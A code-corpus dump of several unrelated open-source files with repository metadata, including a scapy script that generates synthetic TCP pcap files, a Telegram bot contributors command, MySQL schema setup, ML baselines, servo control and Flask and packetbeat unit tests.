print 'Loaded %s by %s matrix from %s' % (len(distance_matrix), len(distance_matrix[0]), input_distance_matrix_filename)
# Convert to numpy matrix of floats
distance_matrix = np.array(distance_matrix).astype('float')
num_timesteps = distance_matrix.shape[0]
json_dict = {}
json_dict['distancematrix'] = distance_matrix.tolist()
earliest_time = '02/28/2016 20:20:20'
earliest_time_struct = datetime.datetime.strptime(earliest_time, "%m/%d/%Y %H:%M:%S")
times = [str(earliest_time_struct + datetime.timedelta(seconds=t)) for t in range(num_timesteps)]
json_dict['data'] = [{'name': dataset_name, 'timelabels': times}]
# Finally, write the .json file
with open(output_json_filename, 'w') as outfile:
json.dump(json_dict, outfile)
print "Outputted time curve data to .json file (%s)" % output_json_filename
|
[
"natguy@cs.washington.edu"
] |
natguy@cs.washington.edu
|
654826afa60eff170f1cc0644218bfd1fd403918
|
67125475ea684e661948e3918cbceafb9b03c9af
|
/DewmiBot/modules/contributors.py
|
ede0033b8c652d151a400102b872746719eb9472
|
[] |
no_license
|
ImTheekshana126/Dewmi-Group-Manage-Bot
|
60a359e3e380756ec3cd9f739666ee045413183b
|
54a691ee22f4be463aa295b992539217cefddba1
|
refs/heads/main
| 2023-08-15T04:39:38.575090
| 2021-09-28T09:45:27
| 2021-09-28T09:45:27
| 410,700,598
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
import github # pyGithub
from pyrogram import filters
from DewmiBot.services.pyrogram import pbot as client
@client.on_message(filters.command("contributors") & ~filters.edited)
async def give_cobtribs(c, m):
g = github.Github()
co = ""
n = 0
repo = g.get_repo("youtubeslgeekshow/sz-rose-bot")
for i in repo.get_contributors():
n += 1
co += f"{n}. [{i.login}](https://github.com/{i.login})\n"
t = f"**Szrosebot Contributors**\n\n{co}\n\n\nA Powerful BOT to Make Your Groups Secured and Organized ! ✨"
await m.reply(t, disable_web_page_preview=True)
__help__ = """
@szrosebot🇱🇰
Contributor
❍ /contributors : contributors using this bot
"""
__mod_name__ = "contributors"
|
[
"noreply@github.com"
] |
ImTheekshana126.noreply@github.com
|
d3dd62fc04a8f4b024b7061a3a1f5860ef683e74
|
d4f134b9c3e537e22cc1546c4d9f4a6383293644
|
/create_database/setup.py
|
6034e2a7c402fc6e1316f38b3f4fdead23a62286
|
[] |
no_license
|
ffallrain/SPA_server
|
158d318e4f8aef56615a81b42a01753aa92aef3a
|
0e0017a8f44f70426afb56b929f6e10a781fa6be
|
refs/heads/master
| 2021-01-16T18:55:05.868856
| 2019-07-11T11:37:21
| 2019-07-11T11:37:21
| 100,125,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,816
|
py
|
#!/usr/bin/python
import mysql.connector as mc
db = mc.connect( host = 'localhost',
user = 'fuqy',
passwd = '123',
database = 'SPA_database',
)
mycursor = db.cursor()
mycursor.execute("""CREATE TABLE system_information
( index_number INT NOT NULL AUTO_INCREMENT ,
pdb_id CHAR(4),
chain CHAR(1),
binding_site_definition VARCHAR(3),
resolution FLOAT,
number_of_hydration_sites SMALLINT,
alternative_pose CHAR(1),
register_date TIMESTAMP ,
PRIMARY KEY ( index_number )
)
""")
mycursor.execute("""CREATE TABLE water_cluster
( primary_key_number INT NOT NULL AUTO_INCREMENT ,
index_number INT,
water_index SMALLINT,
water_type CHAR(3),
occ FLOAT,
vdw_sol FLOAT,
vdw_rec FLOAT,
ele_sol FLOAT,
ele_rec FLOAT,
t_s FLOAT,
o_s FLOAT,
spa_g FLOAT,
rt FLOAT,
o_x FLOAT,
o_y FLOAT,
o_z FLOAT,
h1_x FLOAT,
h1_y FLOAT,
h1_z FLOAT,
h2_x FLOAT,
h2_y FLOAT,
h2_z FLOAT,
PRIMARY KEY ( primary_key_number ),
FOREIGN KEY ( index_number ) REFERENCES system_information(index_number)
);
""")
|
[
"ffallrain@163.com"
] |
ffallrain@163.com
|
ad0ff9dd8f94e44da2c676929e72f84e4397e58a
|
d2e542fd6ae78218ef6400cdd1cfd591fc51c23a
|
/code/baselines.py
|
8edd011cb6bf5fd5fdef1e989424282e852fda64
|
[] |
no_license
|
penggewudi/SCD_System_3.0
|
ecfade086501ca12db2005272c60c8dd28c20d19
|
bb704eebb4d638cbbd988fb1ee33cba7766233d5
|
refs/heads/master
| 2022-06-16T11:53:51.736956
| 2020-05-04T12:37:43
| 2020-05-04T12:37:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,767
|
py
|
# -*- coding: utf-8 -*-
# @Time : 2019/12/9 15:19
# @Author : Chen Yu
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor
import lightgbm as lgb
from code.utils.input_data import load_data, preprocess_data
from code.utils.utils import evaluation
import warnings
warnings.filterwarnings("ignore")
def my_svr(X_train, Y_train, X_test):
reg = SVR()
reg.fit(X_train, Y_train)
Y_pred = reg.predict(X_test)
return Y_pred
def my_rdf(X_train, Y_train, X_test):
reg = RandomForestRegressor()
reg.fit(X_train, Y_train)
Y_pred = reg.predict(X_test)
return Y_pred
def my_gbm(X_train, Y_train, X_test):
reg = lgb.LGBMRegressor()
reg.fit(X_train, Y_train)
Y_pred = reg.predict(X_test)
return Y_pred
if __name__ == '__main__':
# ==== Hyper Parameters
SEQ_LEN = 9
PRE_LEN = 1
TRAIN_RATE = .8
# ==== read data
data, adj = load_data('sh')
time_len = data.shape[0]
num_nodes = data.shape[1]
# ==== predict every station
all_rmse, all_mae, all_mape, all_acc, all_r2_score, all_var_score = [], [], [], [], [], []
for node in range(num_nodes):
if node % 10 == 0:
print('dealed:%s' % node, 'all:%s' % num_nodes)
station_data = data[:, node]
# ==== normalization
mms = MinMaxScaler()
station_data = mms.fit_transform(station_data)
X_train, Y_train, X_test, Y_test = preprocess_data(station_data, TRAIN_RATE, SEQ_LEN, PRE_LEN)
X_train = X_train.reshape(-1, SEQ_LEN)
X_test = X_test.reshape(-1, SEQ_LEN)
Y_train = Y_train.reshape(-1)
# ==== choose method
# Y_pred = my_svr(X_train, Y_train, X_test)
# Y_pred = my_rdf(X_train, Y_train, X_test)
Y_pred = my_gbm(X_train, Y_train, X_test)
Y_pred = Y_pred.reshape(-1, 1)
Y_test = Y_test.reshape(-1, 1)
Y_test = mms.inverse_transform(Y_test)
Y_pred = mms.inverse_transform(Y_pred)
rmse, mae, mape, acc, r2_score, var_score = evaluation(Y_test, Y_pred)
all_rmse.append(rmse)
all_mae.append(mae)
all_mape.append(mape)
all_acc.append(acc)
all_r2_score.append(r2_score)
all_var_score.append(var_score)
print('All score:',
'min_rmse:{:.4}'.format(np.mean(all_rmse)),
'min_mae:{:.4}'.format(np.mean(all_mae)),
'max_acc:{:.4}'.format(np.nanmean(all_acc)),
'min_mape:{:.4}'.format(np.mean(all_mape)),
'r2:{:.4}'.format(np.nanmean(all_r2_score)),
'var:{:.4}'.format(np.nanmean(all_var_score)))
|
[
"yuchen.723@bytedance.com"
] |
yuchen.723@bytedance.com
|
7ec766d97ef91051922f663f47a391d840e63cea
|
353964dbdea07cee2f948f5a08c14205fdc110e9
|
/scapy_pcap.py
|
14267ae9fe056162a5bd6db7bd4db7c8efcff1a4
|
[
"MIT"
] |
permissive
|
vnetman/scapy-pcap
|
571c8411280f186fac13936b021def01d3504992
|
b967242bb1c8727cf58cb1b4515849f0486ee382
|
refs/heads/master
| 2020-03-07T08:46:51.091754
| 2018-04-03T04:45:33
| 2018-04-03T04:45:33
| 127,388,437
| 5
| 2
| null | 2018-03-30T06:31:06
| 2018-03-30T06:05:40
| null |
UTF-8
|
Python
| false
| false
| 14,695
|
py
|
#!/usr/bin/env python3
# MIT License
# Copyright (c) 2018 vnetman@zoho.com
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#----------------------------------------------------------------------
# The purpose of this script is to generate a single .pcap file.
#
# ./scapy_pcap.py --out <file.pcap>
#
# The .pcap file contains packets for one or more complete TCP
# sessions (starting from the SYN handshake to the FIN/ACK
# sequence).
#
# The parameters of the TCP sessions (i.e. addresses, packet lengths,
# bitrates etc.) are coded in the script itself, because it is too
# cumbersome to specify these on the command line.
#
# It is possible to start a TCP session whilst others are in progress
# (i.e. it is not necessary to start a session only after the previous
# one has finished).
#
# Packet lengths as well as bitrates can also be specified on a
# per-session basis.
#------------------------------------------------------------------------
# Suppress scapy IPv6 default route message
import logging
prev_level = logging.getLogger("scapy.runtime").getEffectiveLevel()
# save prev log level
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# import modules
from scapy.all import *
from scapy.utils import PcapWriter
# restore prev log level
logging.getLogger("scapy.runtime").setLevel(prev_level)
import time
from random import randint
import argparse
# The 'stream_specs' tuple defined below is used to generate a set of
# streams like this (X axis is time in seconds, e.g. Stream C starts
# at offset 140 seconds and lasts 150 seconds (i.e. upto the 290
# second mark)):
#
#
# 0 300
# Stream A: |---------------------------------| 30kbps
# Packet len = 1400 bytes
#
# 10 120
# Stream B: |-----------| 1Mbps
# Packet len = 580 bytes
#
# 140 290
# Stream C: |--------------| 200kbps
# Packet len = 700 bytes
#
# 110 145
# Stream D: |-----| 4Mbps
# Packet len = 100 bytes
#
# 142 146
# Stream E: |--| 20Mbps
# Packet len = 70 bytes
# The sessions are specified here. Modify to suit.
#
stream_specs = (
{'name' : 'Stream A',
'server_ip' : '1.1.1.14',
'client_ip' : '1.1.1.11',
'server_mac' : '00:00:0c:01:01:14',
'client_mac' : '00:00:0c:01:01:11',
'server_port' : 80,
'client_port' : 1050,
'rate_bps' : 30 * 1000,
'packet_length' : 1400,
'duration' : 300,
'start_at' : 0},
{'name' : 'Stream B',
'server_ip' : '1.1.1.15',
'client_ip' : '1.1.1.13',
'server_mac' : '00:00:0c:01:01:15',
'client_mac' : '00:00:0c:01:01:13',
'server_port' : 80,
'client_port' : 1051,
'rate_bps' : 1 * 1000 * 1000,
'packet_length' : 580,
'duration' : 120 - 10,
'start_at' : 10},
{'name' : 'Stream C',
'server_ip' : '1.1.1.15',
'client_ip' : '1.1.1.11',
'server_mac' : '00:00:0c:01:01:15',
'client_mac' : '00:00:0c:01:01:11',
'server_port' : 80,
'client_port' : 1052,
'rate_bps' : 200 * 1000,
'packet_length' : 700,
'duration' : 290 - 140,
'start_at' : 140},
{'name' : 'Stream D',
'server_ip' : '1.1.1.14',
'client_ip' : '1.1.1.13',
'server_mac' : '00:00:0c:01:01:14',
'client_mac' : '00:00:0c:01:01:13',
'server_port' : 8080,
'client_port' : 1053,
'rate_bps' : 4 * 1000 * 1000,
'packet_length' : 100,
'duration' : 145 - 110,
'start_at' : 110},
{'name' : 'Stream E',
'server_ip' : '1.1.1.14',
'client_ip' : '1.1.1.13',
'server_mac' : '00:00:0c:01:01:14',
'client_mac' : '00:00:0c:01:01:13',
'server_port' : 443,
'client_port' : 1054,
'rate_bps' : 20 * 1000 * 1000,
'packet_length' : 70,
'duration' : 146 - 142,
'start_at' : 142},)
#----------------------------------------------------------------------
def bps_to_pps(bits_per_sec, packet_len):
"""Given a bits-per-second value, return the packets per second for the
given packet length. Also return the time interval (in seconds) between
successive packets"""
packets_per_sec = (bits_per_sec / (8 * packet_len))
inter_packet_gap_sec = 1.0 / packets_per_sec
return (packets_per_sec, inter_packet_gap_sec)
#----------------------------------------------------------------------
def make_tcp_stream(client_ip, server_ip, client_mac, server_mac,
client_port, server_port, bps, duration,
ts_first_packet, packet_len):
"""Return an array of 2-tuples, each 2-tuple representing a packet. The
first member of each tuple is the timestamp (at which it is inserted in the
pcap), and the second member is a dictionary that contains packet
information (src & dest ip addresses, tcp ack & seq numbers, etc.)"""
stream = []
ts = ts_first_packet
# Random TCP sequence numbers
c_isn = randint(1000, 1000000)
s_isn = randint(1000, 1000000)
# SYN; (c->s)
p = { 'EtherDst' : server_mac,
'EtherSrc' : client_mac,
'IpSrc' : client_ip,
'IpDst' : server_ip,
'TcpSrc' : client_port,
'TcpDst' : server_port,
'TcpFlags' : 'S',
'TcpSeqNo' : c_isn }
stream.append((ts, p,))
ts = ts + 0.2
# SYN+ACK; (s->c)
p = { 'EtherDst' : client_mac,
'EtherSrc' : server_mac,
'IpSrc' : server_ip,
'IpDst' : client_ip,
'TcpSrc' : server_port,
'TcpDst' : client_port,
'TcpFlags' : 'SA',
'TcpSeqNo' : s_isn,
'TcpAckNo' : c_isn + 1 }
stream.append((ts, p,))
ts = ts + 0.2
# ACK; (c->s)
p = { 'EtherDst' : server_mac,
'EtherSrc' : client_mac,
'IpSrc' : client_ip,
'IpDst' : server_ip,
'TcpSrc' : client_port,
'TcpDst' : server_port,
'TcpFlags' : 'A',
'TcpSeqNo' : c_isn + 1,
'TcpAckNo' : s_isn + 1 }
stream.append((ts, p,))
ts = ts + 0.2
# packet_len is inclusive of ether, ipv4 and tcp headers; check if it
# is sane
header_size = 14 + 20 + 20 # ether + ipv4 + tcp
if packet_len < header_size:
raise ValueError('Specified packet length {} is smaller than '
'the minimum allowed ({})'.
format(packet_len, header_size))
tcp_payload_len = packet_len - header_size
(pps, gap) = bps_to_pps(bps, packet_len)
num_packets = int(pps * duration) + 1
server_data_offset = 0
payload = RandString(size = tcp_payload_len)
# From this point on, server sends packets with TCP payloads, and
# the client just acks them => client seq number does not increment
for i in range(0, num_packets):
# Data; (s->c)
p = { 'EtherDst' : client_mac,
'EtherSrc' : server_mac,
'IpSrc' : server_ip,
'IpDst' : client_ip,
'TcpSrc' : server_port,
'TcpDst' : client_port,
'TcpFlags' : 'A',
'TcpSeqNo' : s_isn + 1 + server_data_offset,
'TcpAckNo' : c_isn + 1,
'TcpData' : payload }
stream.append((ts, p,))
# We stick the (c->s) ack halfway between two successive data packets
ts = ts + (gap/2)
server_data_offset = server_data_offset + tcp_payload_len
# Ack; (c->s)
p = { 'EtherDst' : server_mac,
'EtherSrc' : client_mac,
'IpSrc' : client_ip,
'IpDst' : server_ip,
'TcpSrc' : client_port,
'TcpDst' : server_port,
'TcpFlags' : 'A',
'TcpSeqNo' : c_isn + 1,
'TcpAckNo' : s_isn + 1 + server_data_offset }
stream.append((ts, p,))
ts = ts + (gap/2)
# FIN; (s->c)
p = { 'EtherDst' : client_mac,
'EtherSrc' : server_mac,
'IpSrc' : server_ip,
'IpDst' : client_ip,
'TcpSrc' : server_port,
'TcpDst' : client_port,
'TcpFlags' : 'F',
'TcpSeqNo' : s_isn + 1 + server_data_offset,
'TcpAckNo' : 0 }
stream.append((ts, p,))
ts = ts + 0.2
# ACK; (c->s)
p = { 'EtherDst' : server_mac,
'EtherSrc' : client_mac,
'IpSrc' : client_ip,
'IpDst' : server_ip,
'TcpSrc' : client_port,
'TcpDst' : server_port,
'TcpFlags' : 'A',
'TcpSeqNo' : c_isn + 1,
'TcpAckNo' : s_isn + 2 + server_data_offset }
stream.append((ts, p,))
ts = ts + 0.2
# FIN; (c->s)
p = { 'EtherDst' : server_mac,
'EtherSrc' : client_mac,
'IpSrc' : client_ip,
'IpDst' : server_ip,
'TcpSrc' : client_port,
'TcpDst' : server_port,
'TcpFlags' : 'F',
'TcpSeqNo' : c_isn + 1,
'TcpAckNo' : 0 }
stream.append((ts, p,))
ts = ts + 0.2
# ACK; (s->c)
p = { 'EtherDst' : client_mac,
'EtherSrc' : server_mac,
'IpSrc' : server_ip,
'IpDst' : client_ip,
'TcpSrc' : server_port,
'TcpDst' : client_port,
'TcpFlags' : 'A',
'TcpSeqNo' : s_isn + 2 + server_data_offset,
'TcpAckNo' : c_isn + 2 }
stream.append((ts, p,))
return stream
#----------------------------------------------------------------------
def main():
desc = """Generate pcap file for one or more TCP/IPv4 streams.
Stream characteristics (IP addresses, bitrates, packet lengths etc.)
are coded in the script file itself."""
parser = argparse.ArgumentParser(description = desc)
parser.add_argument('--out', required = True,
metavar = '<output pcap file name>')
args = parser.parse_args()
if (os.path.isfile(args.out)):
print('"{}" already exists, refusing to overwrite.'.format(args.out))
sys.exit(-1)
streams = []
for ss in stream_specs:
s = make_tcp_stream(server_ip = ss['server_ip'],
client_ip = ss['client_ip'],
server_mac = ss['server_mac'],
client_mac = ss['client_mac'],
client_port = ss['client_port'],
server_port = ss['server_port'],
bps = ss['rate_bps'],
duration = ss['duration'],
ts_first_packet = ss['start_at'],
packet_len = ss['packet_length'])
print('"{}" contains {} packets'.format(ss['name'], len(s)))
streams.append(s)
print('{} streams in this pcap'.format(len(streams)))
# The 'all' dictionary contains information about every packet
# that will go into the pcap.
#
# Key => timestamp (rendered as a string)
# Value => list of (packet, timestamp) tuples at that timestamp
# (since we allow more than one stream, there can be more than one
# packet at the exact same timestamp)
all = dict()
total_packets = 0
for s in streams:
for (ts, p) in s:
key = '%014.6f' % ts
if not key in all:
all[key] = []
all[key].append((p, ts,))
total_packets = total_packets + 1
pcap = PcapWriter(args.out, append = True, sync = False)
rendered = 0
# Sorting the keys of the 'all' dictionary gives us the packets in
# the correct chronological order.
for key in sorted(all):
for (pkt, ts) in all[key]:
# Make a scapy packet with the available packet
# information.
scapy_pkt = Ether(dst = pkt['EtherDst'], src = pkt['EtherSrc'])/ \
IP(dst = pkt['IpSrc'], src = pkt['IpDst'])/ \
TCP(sport = pkt['TcpSrc'], dport = pkt['TcpDst'], \
flags = pkt['TcpFlags'], seq = pkt['TcpSeqNo'])/ \
Raw(load = '')
if 'TcpAckNo' in pkt:
scapy_pkt[TCP].ack = pkt['TcpAckNo']
else:
scapy_pkt[TCP].ack = 0
if 'TcpData' in pkt:
scapy_pkt[Raw].load = pkt['TcpData']
# Write the scapy packet to the pcap
scapy_pkt.time = ts
pcap.write(scapy_pkt)
# Report progress to the impatient user
rendered = rendered + 1
percent = 0
if (rendered % 1000) == 0:
percent = int((rendered * 100.0)/total_packets)
print('Wrote {} ({}%) of {} packets'.
format(rendered, percent, total_packets),
flush = True, end = '\r')
print('Finished writing {} packets '.format(total_packets),
flush = True)
#----------------------------------------------------------------------
if __name__ == '__main__':
main()
|
[
"vnetman@zoho.com"
] |
vnetman@zoho.com
|
f228d88fdc9ae6482911ca6591acb3efc095a7b3
|
4b45472571a0af88d8c313e07907c3993d2e1ed4
|
/tests/test_0017_mysql_long_result.py
|
8049dc3f138a652590ce2af077f8716ccf8c100d
|
[
"Apache-2.0"
] |
permissive
|
shengxinking/packetbeat
|
04957e90c2809545283f3f672c2b4bfb3c0b8f32
|
45a5a1dda2dc61b35f844d8cf638886c5bb4e7e9
|
refs/heads/master
| 2020-12-13T22:36:02.287309
| 2015-05-31T17:10:14
| 2015-05-31T17:10:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,829
|
py
|
from pbtests.packetbeat import TestCase
"""
Tests for trimming long results in mysql.
"""
class Test(TestCase):
def test_default_settings(self):
"""
Should store the entire rows but only
10 rows with default settings.
"""
self.render_config_template(
mysql_ports=[3306],
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap")
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 11 # 10 plus header
for line in lines[3:]:
print len(line)
assert len(line) == 261
def test_max_row_length(self):
"""
Should be able to cap the row length.
"""
self.render_config_template(
mysql_ports=[3306],
mysql_max_row_length=79,
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 11 # 10 plus header
for line in lines[3:]:
assert len(line) == 81 # 79 plus two separators
def test_max_rows(self):
"""
Should be able to cap the number of rows
"""
self.render_config_template(
mysql_ports=[3306],
mysql_max_row_length=79,
mysql_max_rows=5,
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 6 # 5 plus header
for line in lines[3:]:
assert len(line) == 81 # 79 plus two separators
def test_larger_max_rows(self):
"""
Should be able to cap the number of rows
"""
self.render_config_template(
mysql_ports=[3306],
mysql_max_rows=2000,
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 16 # 15 plus header
|
[
"tudor@packetbeat.com"
] |
tudor@packetbeat.com
|
8e42ad80805c71fb93cfaa671563d3067fafd033
|
485bcb12e904e440c9b836757736512e94838b78
|
/foobar.py
|
e5eb60254a77157ce3f7e8c4a44dda5d0ec491bc
|
[] |
no_license
|
pritikmshaw/Algorithms
|
4e869f696ea66508ba66a78b3bc9ced3f53b2d52
|
5686258f011a445b3232bdc9e1d1929fe317956b
|
refs/heads/master
| 2023-01-27T16:02:49.898331
| 2020-12-15T15:02:31
| 2020-12-15T15:02:31
| 300,283,685
| 0
| 0
| null | 2020-10-01T13:10:09
| 2020-10-01T13:10:08
| null |
UTF-8
|
Python
| false
| false
| 356
|
py
|
def solution(st):
st1 = ""
for i in st:
if (i>='a' and i<='z'):
a = ord(i)
b = chr(219-a)
st1 = st1 + b
else:
st1 = st1 + i
return st1
sol = solution("Yvzs! I xzm'g yvorvev Lzmxv olhg srh qly zg gsv xlolmb!!")
print(sol)
|
[
"shawavisek35@gmail.com"
] |
shawavisek35@gmail.com
|
f91d4bdb6e32a05f050fff3af586e91c7940fad6
|
e7c9aed76416f81a6a2d62606f18c8d9b18c44a3
|
/servo.py
|
d05e799bd3492242d87a4be4650c1e466fc8e3d0
|
[] |
no_license
|
NikodemBartnik/FollowBotV2
|
b31f4aa5ba4c53101b928635bc90b237991407f3
|
a237dcdb63b23033ff85cfe977e4fd4085eefff9
|
refs/heads/master
| 2022-12-07T23:39:08.335653
| 2020-08-28T13:27:39
| 2020-08-28T13:27:39
| 291,053,845
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
from fpioa_manager import fm, board_info
from machine import Timer,PWM
import time
fm.register(board_info.JTAG_TCK,fm.fpioa.GPIO0)
tim1 = Timer(Timer.TIMER0, Timer.CHANNEL0, mode=Timer.MODE_PWM)
ch1 = PWM(tim1, freq=50, duty=5, pin=board_info.JTAG_TCK)
tim2 = Timer(Timer.TIMER1, Timer.CHANNEL0, mode=Timer.MODE_PWM)
ch2 = PWM(tim2, freq=50, duty=5, pin=board_info.JTAG_TDI)
while True:
for x in range(180):
duty = 5*(x/180)+5
ch1.duty(duty)
ch2.duty(duty)
time.sleep(0.02)
for x in range(180):
duty = 5*(1-(x/180))+5
ch1.duty(duty)
ch2.duty(duty)
time.sleep(0.02)
|
[
"nikodem.bartnik@gmail.com"
] |
nikodem.bartnik@gmail.com
|
2bbcb9ac2adbbeaab98aa9c2008c06bd85850641
|
c6d0cc1a2466debc8ab3bedaa784143478788472
|
/test_api_server.py
|
32c52722bdcda616b0edc173cc499c341c4ddcc0
|
[] |
no_license
|
kevinpeizner/infinote
|
222cb40863e8e62e1f9089ce866c44d673a1be0c
|
2f3530b8107698211c32f57539c20933a445a629
|
refs/heads/master
| 2021-01-21T13:52:42.284698
| 2016-05-07T09:10:43
| 2016-05-07T09:10:43
| 44,779,223
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,873
|
py
|
#!/usr/bin/env python
import os, json, unittest, base64
from datetime import datetime
from unittest.mock import MagicMock
from flask import Flask, jsonify
from flask.ext.testing import TestCase
from contextlib import suppress
from werkzeug.exceptions import NotFound, MethodNotAllowed
from werkzeug.routing import RequestRedirect
from app import infinote
from app.config import basedir, infinote_app, db
from app.infinote import ProcessException
from app.models import User, Job, RuntimeData, RuntimeDataException
class HelperTestCases(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_make_public_job(self):
uid = 1
jid = 1234
mock_ts = datetime.utcnow().timestamp()
mock_job = {
'id': 1234,
'v_id': 'abcd',
'label': 'mock_job',
'stage': 'init',
'prog': 0.00,
'link': 'http://somelink.com',
'timestamp': mock_ts
}
# case 1
infinote.runtime_data.getJob = MagicMock(return_value=None)
infinote.abort = MagicMock()
res = infinote._make_public_job(uid, jid)
infinote.abort.assert_called_with(404)
self.assertEqual({'error': 'Not found'}, res)
infinote.runtime_data.getJob.assert_called_once_with(uid, jid)
infinote.runtime_data.getJob.reset_mock()
# case 2
infinote.runtime_data.getJob = MagicMock(return_value=mock_job)
infinote.url_for = MagicMock(return_value='http://mock_job_link')
res = infinote._make_public_job(uid, jid)
expected = mock_job
expected['uri']='http://mock_job_link'
expected.pop('id')
self.assertEqual(expected, res)
infinote.runtime_data.getJob.assert_called_once_with(uid, jid)
def test_extract_v_id(self):
# case 1
expected = test_data = '11111111111'
res = infinote._extract_v_id(test_data)
self.assertEqual(expected, res)
# case 2
test_data = 'www.youtube.com/watch?v=11111111111'
res = infinote._extract_v_id(test_data)
self.assertEqual(expected, res)
# case 3
test_data = 'youtube.com/watch?v=11111111111'
res = infinote._extract_v_id(test_data)
self.assertEqual(expected, res)
# case 4
test_data = 'youtu.com/watch?v=11111111111'
res = infinote._extract_v_id(test_data)
self.assertIsNone(res)
# case 5
test_data = ''
res = infinote._extract_v_id(test_data)
self.assertIsNone(res)
def test_spaw_job(self):
u = User('Tom', 'tom@email.com')
u.id = 1
link = 'www.youtube.com/watch?v=11111111111'
v_id = '11111111111'
# case 1a/1b - _extract_v_id fails
infinote._extract_v_id = MagicMock(return_value=None)
self.assertRaises(ProcessException, infinote._spawn_job, "Don't care", link)
infinote._extract_v_id.assert_called_once_with(link)
infinote._extract_v_id.reset_mock()
infinote._extract_v_id = MagicMock(return_value='2346')
self.assertRaises(ProcessException, infinote._spawn_job, "Don't care", link)
infinote._extract_v_id.assert_called_once_with(link)
infinote._extract_v_id.reset_mock()
# case 2 - createJob fails
infinote._extract_v_id = MagicMock(return_value=v_id)
infinote.runtime_data.createJob = MagicMock(side_effect=RuntimeDataException(400, 'mock_exception'))
self.assertRaises(ProcessException, infinote._spawn_job, u, link)
infinote.runtime_data.createJob.assert_called_once_with(u.id, v_id)
infinote._extract_v_id.assert_called_once_with(link)
infinote.runtime_data.createJob.reset_mock()
infinote._extract_v_id.reset_mock()
class APITestCases(TestCase):
tested_urls = set()
def create_app(self):
test_app = Flask(__name__)
test_app.config['TESTING']= True
test_app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, '_test.db')
return test_app
@classmethod
def setUpClass(cls):
APITestCases.url_map = infinote_app.url_map
def setUp(self):
self.test_client = infinote_app.test_client()
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
def test_zzz_all_endpoints_tested(self):
self.skipTest('Finish implementing API tests first.')
expected_urls = set()
for rule in infinote.url_map.iter_rules():
expected_urls.add(str(rule))
#print(expected_urls)
self.assertSetEqual(expected_urls, APITestCases.tested_urls)
def _tested_endpoint(self, endpoint):
# http://werkzeug.pocoo.org/docs/0.11/routing/#werkzeug.routing.MapAdapter.match
# These exceptions are suppressed because they mean an endpoint matched a
# rule, but not the method or the url redirects. That's OK, we still
# matched the rule - so we don't care about the exception.
with suppress(MethodNotAllowed, RequestRedirect):
try:
rule, ignore_arg = APITestCases.url_map.bind('').match(endpoint, return_rule=True)
except NotFound as e:
self.assertTrue(False, "{} did not match any endpoint rules on our server.".format(endpoint))
#print("\n\tRule returned:\t", rule)
APITestCases.tested_urls.add(str(rule))
def _error_msg(self, method, endpoint):
return 'Is {} supported at {}?'.format(method, endpoint)
def _verify_methods(self, supported_methods, endpoint):
"""
Verify that the methods not supported for a given endpoint return 405 and
that methods that are supported do not return 405.
Args:
supported_methods -- frozenset of uppercase HTTP method strings.
endpoint -- a string representing an API endpoint.
"""
self.assertIsInstance(supported_methods, frozenset, 'supported_methods must be a frozenset of strings.')
if 'GET' in supported_methods:
resp = self.test_client.get(endpoint)
self.assertNotEqual(405, resp.status_code, self._error_msg('GET', endpoint))
else:
resp = self.test_client.get(endpoint)
self.assert405(resp, self._error_msg('GET', endpoint))
if 'HEAD' in supported_methods:
resp = self.test_client.head(endpoint)
self.assertNotEqual(405, resp.status_code, self._error_msg('HEAD', endpoint))
else:
resp = self.test_client.head(endpoint)
self.assert405(resp, self._error_msg('HEAD', endpoint))
if 'POST' in supported_methods:
resp = self.test_client.post(endpoint)
self.assertNotEqual(405, resp.status_code, self._error_msg('POST', endpoint))
else:
resp = self.test_client.post(endpoint)
self.assert405(resp, self._error_msg('POST', endpoint))
if 'PUT' in supported_methods:
resp = self.test_client.put(endpoint)
self.assertNotEqual(405, resp.status_code, self._error_msg('PUT', endpoint))
else:
resp = self.test_client.put(endpoint)
self.assert405(resp, self._error_msg('PUT', endpoint))
